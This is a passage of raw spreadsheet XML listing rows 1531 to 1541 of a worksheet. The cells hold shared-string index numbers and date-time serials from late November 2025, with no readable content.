      <c r="O1531" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1531" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1531" s="23"/>
      <c r="R1531" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1531" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1531" s="23"/>
      <c r="U1531" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1531" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1531" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1531" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1531" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1531" s="24">
        <v>45979.7088888889</v>
      </c>
      <c r="AA1531" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1531" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1531" s="23"/>
      <c r="AD1531" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1531" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1531" s="23"/>
      <c r="AG1531" s="25" t="s">
        <v>8475</v>
      </c>
      <c r="AH1531" s="24">
        <v>45979.7089467593</v>
      </c>
      <c r="AI1531" s="23"/>
      <c r="AJ1531" s="23"/>
      <c r="AK1531" s="23"/>
      <c r="AL1531" s="23"/>
      <c r="AM1531" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1531" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1531" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1531" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1531" s="24">
        <v>45979.7297222222</v>
      </c>
      <c r="AR1531" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1531" s="23"/>
      <c r="AT1531" s="23"/>
      <c r="AU1531" s="23"/>
    </row>
    <row r="1532" s="1" customFormat="1" spans="1:47">
      <c r="A1532" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1532" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1532" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1532" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1532" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1532" s="23" t="s">
        <v>10962</v>
      </c>
      <c r="G1532" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1532" s="23"/>
      <c r="I1532" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1532" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1532" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1532" s="24">
        <v>45979.4566898148</v>
      </c>
      <c r="M1532" s="24">
        <v>45979.4566898148</v>
      </c>
      <c r="N1532" s="23" t="s">
        <v>8446</v>
      </c>
      <c r="O1532" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1532" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1532" s="23"/>
      <c r="R1532" s="23" t="s">
        <v>8641</v>
      </c>
      <c r="S1532" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1532" s="23"/>
      <c r="U1532" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1532" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1532" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1532" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1532" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1532" s="24">
        <v>45979.4575694444</v>
      </c>
      <c r="AA1532" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1532" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1532" s="23"/>
      <c r="AD1532" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1532" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1532" s="23"/>
      <c r="AG1532" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1532" s="24">
        <v>45979.4575925926</v>
      </c>
      <c r="AI1532" s="23"/>
      <c r="AJ1532" s="23"/>
      <c r="AK1532" s="23"/>
      <c r="AL1532" s="23"/>
      <c r="AM1532" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1532" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1532" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1532" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1532" s="24">
        <v>45979.4784027778</v>
      </c>
      <c r="AR1532" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1532" s="23"/>
      <c r="AT1532" s="23"/>
      <c r="AU1532" s="23"/>
    </row>
    <row r="1533" s="1" customFormat="1" spans="1:47">
      <c r="A1533" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1533" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1533" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1533" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1533" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1533" s="23" t="s">
        <v>10963</v>
      </c>
      <c r="G1533" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1533" s="23"/>
      <c r="I1533" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1533" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1533" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1533" s="24">
        <v>45979.3745601852</v>
      </c>
      <c r="M1533" s="24">
        <v>45979.3745601852</v>
      </c>
      <c r="N1533" s="23" t="s">
        <v>8446</v>
      </c>
      <c r="O1533" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1533" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1533" s="23"/>
      <c r="R1533" s="23" t="s">
        <v>8448</v>
      </c>
      <c r="S1533" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1533" s="23"/>
      <c r="U1533" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1533" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1533" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1533" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1533" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1533" s="24">
        <v>45979.3752893519</v>
      </c>
      <c r="AA1533" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1533" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1533" s="23"/>
      <c r="AD1533" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1533" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1533" s="23"/>
      <c r="AG1533" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1533" s="24">
        <v>45979.3753125</v>
      </c>
      <c r="AI1533" s="23"/>
      <c r="AJ1533" s="23"/>
      <c r="AK1533" s="23"/>
      <c r="AL1533" s="23"/>
      <c r="AM1533" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1533" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1533" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1533" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1533" s="24">
        <v>45979.3961226852</v>
      </c>
      <c r="AR1533" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1533" s="23"/>
      <c r="AT1533" s="23"/>
      <c r="AU1533" s="23"/>
    </row>
    <row r="1534" s="1" customFormat="1" spans="1:47">
      <c r="A1534" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1534" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1534" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1534" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1534" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1534" s="23" t="s">
        <v>10964</v>
      </c>
      <c r="G1534" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1534" s="23"/>
      <c r="I1534" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1534" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1534" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1534" s="24">
        <v>45978.7215277778</v>
      </c>
      <c r="M1534" s="24">
        <v>45978.7215277778</v>
      </c>
      <c r="N1534" s="23" t="s">
        <v>8446</v>
      </c>
      <c r="O1534" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1534" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1534" s="23"/>
      <c r="R1534" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1534" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1534" s="23"/>
      <c r="U1534" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1534" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1534" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1534" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1534" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1534" s="24">
        <v>45978.7222569444</v>
      </c>
      <c r="AA1534" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1534" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1534" s="23"/>
      <c r="AD1534" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1534" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1534" s="23"/>
      <c r="AG1534" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1534" s="24">
        <v>45978.7222685185</v>
      </c>
      <c r="AI1534" s="23"/>
      <c r="AJ1534" s="23"/>
      <c r="AK1534" s="23"/>
      <c r="AL1534" s="23"/>
      <c r="AM1534" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1534" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1534" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1534" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1534" s="24">
        <v>45978.7430902778</v>
      </c>
      <c r="AR1534" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1534" s="23"/>
      <c r="AT1534" s="23"/>
      <c r="AU1534" s="23"/>
    </row>
    <row r="1535" s="1" customFormat="1" spans="1:47">
      <c r="A1535" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1535" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1535" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1535" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1535" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1535" s="23" t="s">
        <v>10965</v>
      </c>
      <c r="G1535" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1535" s="23"/>
      <c r="I1535" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1535" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1535" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1535" s="24">
        <v>45978.6965393519</v>
      </c>
      <c r="M1535" s="24">
        <v>45978.6965393519</v>
      </c>
      <c r="N1535" s="23" t="s">
        <v>9950</v>
      </c>
      <c r="O1535" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1535" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1535" s="23"/>
      <c r="R1535" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1535" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1535" s="23"/>
      <c r="U1535" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1535" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1535" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1535" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1535" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1535" s="24">
        <v>45978.6973842593</v>
      </c>
      <c r="AA1535" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1535" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1535" s="23"/>
      <c r="AD1535" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1535" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1535" s="23"/>
      <c r="AG1535" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1535" s="24">
        <v>45978.6974305556</v>
      </c>
      <c r="AI1535" s="23"/>
      <c r="AJ1535" s="23"/>
      <c r="AK1535" s="23"/>
      <c r="AL1535" s="23"/>
      <c r="AM1535" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1535" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1535" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1535" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1535" s="24">
        <v>45978.7182175926</v>
      </c>
      <c r="AR1535" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1535" s="23"/>
      <c r="AT1535" s="23"/>
      <c r="AU1535" s="23"/>
    </row>
    <row r="1536" s="1" customFormat="1" spans="1:47">
      <c r="A1536" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1536" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1536" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1536" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1536" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1536" s="23" t="s">
        <v>10966</v>
      </c>
      <c r="G1536" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1536" s="23"/>
      <c r="I1536" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1536" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1536" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1536" s="24">
        <v>45978.623125</v>
      </c>
      <c r="M1536" s="24">
        <v>45978.623125</v>
      </c>
      <c r="N1536" s="23" t="s">
        <v>9950</v>
      </c>
      <c r="O1536" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1536" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1536" s="23"/>
      <c r="R1536" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1536" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1536" s="23"/>
      <c r="U1536" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1536" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1536" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1536" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1536" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1536" s="24">
        <v>45978.6240046296</v>
      </c>
      <c r="AA1536" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1536" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1536" s="23"/>
      <c r="AD1536" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1536" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1536" s="23"/>
      <c r="AG1536" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1536" s="24">
        <v>45978.6240393519</v>
      </c>
      <c r="AI1536" s="23"/>
      <c r="AJ1536" s="23"/>
      <c r="AK1536" s="23"/>
      <c r="AL1536" s="23"/>
      <c r="AM1536" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1536" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1536" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1536" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1536" s="24">
        <v>45978.644837963</v>
      </c>
      <c r="AR1536" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1536" s="23"/>
      <c r="AT1536" s="23"/>
      <c r="AU1536" s="23"/>
    </row>
    <row r="1537" s="1" customFormat="1" spans="1:47">
      <c r="A1537" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1537" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1537" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1537" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1537" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1537" s="23" t="s">
        <v>10967</v>
      </c>
      <c r="G1537" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1537" s="23"/>
      <c r="I1537" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1537" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1537" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1537" s="24">
        <v>45978.5692361111</v>
      </c>
      <c r="M1537" s="24">
        <v>45978.5692361111</v>
      </c>
      <c r="N1537" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1537" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1537" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1537" s="23"/>
      <c r="R1537" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1537" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1537" s="23"/>
      <c r="U1537" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1537" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1537" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1537" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1537" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1537" s="24">
        <v>45978.5698032407</v>
      </c>
      <c r="AA1537" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1537" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1537" s="23"/>
      <c r="AD1537" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1537" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1537" s="23"/>
      <c r="AG1537" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1537" s="24">
        <v>45978.5698263889</v>
      </c>
      <c r="AI1537" s="23"/>
      <c r="AJ1537" s="23"/>
      <c r="AK1537" s="23"/>
      <c r="AL1537" s="23"/>
      <c r="AM1537" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1537" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1537" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1537" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1537" s="24">
        <v>45978.5906365741</v>
      </c>
      <c r="AR1537" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1537" s="23"/>
      <c r="AT1537" s="23"/>
      <c r="AU1537" s="23"/>
    </row>
    <row r="1538" s="1" customFormat="1" spans="1:47">
      <c r="A1538" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1538" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1538" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1538" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1538" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1538" s="23" t="s">
        <v>10968</v>
      </c>
      <c r="G1538" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1538" s="23"/>
      <c r="I1538" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1538" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1538" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1538" s="24">
        <v>45978.4706365741</v>
      </c>
      <c r="M1538" s="24">
        <v>45978.4706365741</v>
      </c>
      <c r="N1538" s="23" t="s">
        <v>9950</v>
      </c>
      <c r="O1538" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1538" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1538" s="23"/>
      <c r="R1538" s="23" t="s">
        <v>1698</v>
      </c>
      <c r="S1538" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1538" s="23"/>
      <c r="U1538" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1538" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1538" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1538" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1538" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1538" s="24">
        <v>45978.4713888889</v>
      </c>
      <c r="AA1538" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1538" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1538" s="23"/>
      <c r="AD1538" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1538" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1538" s="23"/>
      <c r="AG1538" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1538" s="24">
        <v>45978.471412037</v>
      </c>
      <c r="AI1538" s="23"/>
      <c r="AJ1538" s="23"/>
      <c r="AK1538" s="23"/>
      <c r="AL1538" s="23"/>
      <c r="AM1538" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1538" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1538" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1538" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1538" s="24">
        <v>45978.4922222222</v>
      </c>
      <c r="AR1538" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1538" s="23"/>
      <c r="AT1538" s="23"/>
      <c r="AU1538" s="23"/>
    </row>
    <row r="1539" s="1" customFormat="1" spans="1:47">
      <c r="A1539" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1539" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1539" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1539" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1539" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1539" s="23" t="s">
        <v>10969</v>
      </c>
      <c r="G1539" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1539" s="23"/>
      <c r="I1539" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1539" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1539" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1539" s="24">
        <v>45978.411724537</v>
      </c>
      <c r="M1539" s="24">
        <v>45978.411724537</v>
      </c>
      <c r="N1539" s="23" t="s">
        <v>8446</v>
      </c>
      <c r="O1539" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1539" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1539" s="23"/>
      <c r="R1539" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1539" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1539" s="23"/>
      <c r="U1539" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1539" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1539" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1539" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1539" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1539" s="24">
        <v>45978.4126041667</v>
      </c>
      <c r="AA1539" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1539" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1539" s="23"/>
      <c r="AD1539" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1539" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1539" s="23"/>
      <c r="AG1539" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1539" s="24">
        <v>45978.4126273148</v>
      </c>
      <c r="AI1539" s="23"/>
      <c r="AJ1539" s="23"/>
      <c r="AK1539" s="23"/>
      <c r="AL1539" s="23"/>
      <c r="AM1539" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1539" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1539" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1539" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1539" s="24">
        <v>45978.4334375</v>
      </c>
      <c r="AR1539" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1539" s="23"/>
      <c r="AT1539" s="23"/>
      <c r="AU1539" s="23"/>
    </row>
    <row r="1540" s="1" customFormat="1" spans="1:47">
      <c r="A1540" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1540" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1540" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1540" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1540" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1540" s="23" t="s">
        <v>10970</v>
      </c>
      <c r="G1540" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1540" s="23"/>
      <c r="I1540" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1540" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1540" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1540" s="24">
        <v>45978.3702662037</v>
      </c>
      <c r="M1540" s="24">
        <v>45978.4010648148</v>
      </c>
      <c r="N1540" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1540" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1540" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1540" s="23"/>
      <c r="R1540" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1540" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1540" s="23"/>
      <c r="U1540" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1540" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1540" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1540" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1540" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1540" s="24">
        <v>45978.3709953704</v>
      </c>
      <c r="AA1540" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1540" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1540" s="23"/>
      <c r="AD1540" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1540" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1540" s="23"/>
      <c r="AG1540" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1540" s="24">
        <v>45978.3710185185</v>
      </c>
      <c r="AI1540" s="23"/>
      <c r="AJ1540" s="23"/>
      <c r="AK1540" s="23"/>
      <c r="AL1540" s="23"/>
      <c r="AM1540" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1540" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1540" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1540" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1540" s="24">
        <v>45978.3918287037</v>
      </c>
      <c r="AR1540" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1540" s="23"/>
      <c r="AT1540" s="23"/>
      <c r="AU1540" s="23"/>
    </row>
    <row r="1541" s="1" customFormat="1" spans="1:47">
      <c r="A1541" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1541" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1541" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1541" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1541" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1541" s="23" t="s">
        <v>10971</v>
      </c>
      <c r="G1541" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1541" s="23"/>
      <c r="I1541" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1541" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1541" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1541" s="24">
        <v>45978.3693518518</v>
      </c>
      <c r="M1541" s="24">
        <v>45978.3693518518</v>
      </c>
      <c r="N1541" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1541" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1541" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1541" s="23"/>
      <c r="R1541" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1541" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1541" s="23"/>
      <c r="U1541" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1541" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1541" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1541" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1541" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1541" s="24">
        <v>45978.3697569444</v>
      </c>
      <c r="AA1541" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1541" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1541" s="23"/>
      <c r="AD1541" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1541" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1541" s="23"/>
      <c r="AG1541" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1541" s="24">
        <v>45978.3697685185</v>
      </c>
      <c r="AI1541" s="23"/>
      <c r="AJ1541" s="23"/>
      <c r="AK1541" s="23"/>
      <c r="AL1541" s="23"/>
      <c r="AM1541" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1541" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1541" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1541" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1541" s="24">
        <v>45978.3905902778</v>
      </c>
      <c r="AR1541" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1541" s="23"/>
      <c r="AT1541" s="23"/>
